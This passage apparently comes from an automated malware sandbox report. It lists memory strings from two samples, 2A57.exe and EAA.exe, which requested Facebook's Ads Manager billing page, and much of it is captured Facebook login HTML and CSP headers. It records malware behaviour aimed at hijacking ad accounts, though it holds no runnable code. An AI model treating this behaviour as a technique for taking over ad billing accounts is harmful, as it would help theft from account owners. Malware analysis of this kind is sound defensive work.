URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @okwww.facebook.comI equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.comz# equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugNIzC4F1vFACekGvbRuCZvM9i/JJ7xmKSRYpVB7zr3dgmTAvfu/cTqkCH0BDO/wQ9P8BkQs4IOzM64ZCiUQ18bA==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:02 GMTD
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debugv9pvwjTBeSyc6REtf/HyyrsHzOiKKGeco98baI/NkC+BXnPN992p97wxzlPbt3fTR3c3Oeg1pmH+0Ypr4oGtng==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:18 GMTD
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: CELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"endpointURI":"https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/"},5094],["CookieConsentIFrameConfig",[],{"consent_param":"FQASEhIA.ARYwnNKLDW0bAjniimmdEQD0-W4XhYOZM4oDcwHCWRtFB9xI","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u00 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comU/ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comog equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comuyy equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Origin: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Origin: https://www.facebook.comRf equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Owww.facebook.comf equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: P\www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: X-YsLoggerBlue","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"7197781313797005068"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7153952142819129718"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster5;v equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Xwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Facebook Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our servi],["_js_datr","n_FHY6nkgbnL7TwJr7T7egKP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","n_FHY_IGNodBHcrJWk00PK3j",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYzuQ"}}},hblp:{consistency:{rev:1006382194},rsrcMap:{"Yktk/RU":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz"},zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz"},wL2J9cL:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz"}},compMap:{TransportSelectingClientSingleton:{r:["Yktk/RU","07JSiP0"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["8zbEZtu","auB0bNr","/o5YvO2","ZEC4RrQ","XJ5NO10","dHsJQ6y","hKY0QKT","BIylKC4","ciHMngx","cYU3c32","n6W4xMH"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Yktk/RU"],be:1}}}},allResources:["8zbEZtu","zPYlTyl","wL2J9cL","XJ5NO10","/o5YvO2","h3ZzAmG","GpQFBwL","n6W4xMH","FY/FPFf","vGt2mxz","ZEC4RrQ","mRpDwmd","cYU3c32","BIylKC4","hKY0QKT"]});}));</script></body></html> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comd equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.642016530.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: `/Pwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: acebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025KK equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: areers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_ot1t5YjYL3s sx_708a0f"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Meta equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
